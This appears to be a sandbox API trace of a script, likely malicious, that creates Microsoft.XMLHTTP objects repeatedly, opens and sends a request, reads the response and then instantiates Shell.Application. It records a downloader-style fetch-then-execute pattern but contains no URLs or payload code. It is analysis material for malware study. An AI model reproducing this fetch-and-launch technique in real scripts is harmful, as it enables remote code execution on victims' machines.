	[0341.048] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0341.048] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74b0) returned 0x0
	[0341.048] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0341.048] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7518) returned 0x0
	[0341.048] ??2@YAPEAX_K@Z () returned 0x62f310
	[0341.048] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7518, pUnkSite=0x62f310) 
	[0341.048] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0341.049] XMLHTTPRequest:IUnknown:Release (This=0x49c7518) returned 0x0
	[0341.049] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74b0) returned 0x0
	[0341.049] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74b0) returned 0x3
	[0341.049] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0341.049] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74b0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0341.049] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0341.049] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0341.049] SysStringLen (param_1=0x0) returned 0x0
	[0341.049] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0341.049] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0341.049] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5ba0) returned 0x0
	[0341.049] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0341.049] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c08) returned 0x0
	[0341.050] ??2@YAPEAX_K@Z () returned 0x62f330
	[0341.050] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c08, pUnkSite=0x62f330) 
	[0341.050] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0341.050] XMLHTTPRequest:IUnknown:Release (This=0x49c5c08) returned 0x0
	[0341.050] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5ba0) returned 0x0
	[0341.050] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5ba0) returned 0x3
	[0341.050] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0341.050] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5ba0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0341.050] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0341.050] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0341.050] SysStringLen (param_1=0x0) returned 0x0
	[0341.050] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0341.050] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0341.050] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0341.050] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0341.050] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7518) returned 0x0
	[0341.051] ??2@YAPEAX_K@Z () returned 0x62f310
	[0341.051] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7518, pUnkSite=0x62f310) 
	[0341.051] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0341.051] XMLHTTPRequest:IUnknown:Release (This=0x49c7518) returned 0x0
	[0341.051] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0341.051] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0341.051] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0341.051] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0341.051] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0341.051] longjmp () 
	[0341.051] longjmp () 
	[0341.051] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0341.051] SysStringLen (param_1=0x0) returned 0x0
	[0341.051] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0341.051] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0341.052] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7480) returned 0x0
	[0341.052] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0341.052] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7480, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7208) returned 0x0
	[0341.052] ??2@YAPEAX_K@Z () returned 0x62f330
	[0341.052] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7208, pUnkSite=0x62f330) 
	[0341.052] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0341.052] XMLHTTPRequest:IUnknown:Release (This=0x49c7208) returned 0x0
	[0341.052] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7480, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7480) returned 0x0
	[0341.052] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7480) returned 0x3
	[0341.052] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7480, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0341.052] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7480, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0341.052] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7480, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0341.052] longjmp () 
	[0341.052] longjmp () 
	[0341.053] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0341.053] SysStringLen (param_1=0x0) returned 0x0
	[0341.053] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0341.053] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0341.053] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5ba0) returned 0x0
	[0341.053] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0341.053] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74e8) returned 0x0
	[0341.053] ??2@YAPEAX_K@Z () returned 0x62f310
	[0341.053] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74e8, pUnkSite=0x62f310) 
	[0341.053] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0341.053] XMLHTTPRequest:IUnknown:Release (This=0x49c74e8) returned 0x0
	[0341.053] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5ba0) returned 0x0
	[0341.053] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5ba0) returned 0x3
	[0341.053] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0341.053] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5ba0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0341.054] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0341.054] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0341.054] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5ba0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0341.054] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0341.773] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0341.773] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5ba0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0341.773] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0341.773] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0341.773] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5ba0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0341.773] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0341.773] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0341.773] SysStringLen (param_1=0x0) returned 0x0
	[0341.773] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0341.773] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0341.773] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x3967c0) returned 0x0
	[0341.774] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0341.774] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396800) returned 0x0
	[0341.774] ??2@YAPEAX_K@Z () returned 0x62f350
	[0341.774] Shell:IObjectWithSite:SetSite (This=0x396800, pUnkSite=0x62f350) returned 0x0
	[0341.774] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0341.774] Shell:IUnknown:Release (This=0x396800) returned 0x1
	[0341.774] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x3967c0) returned 0x0
	[0341.774] Shell:IUnknown:AddRef (This=0x3967c0) returned 0x3
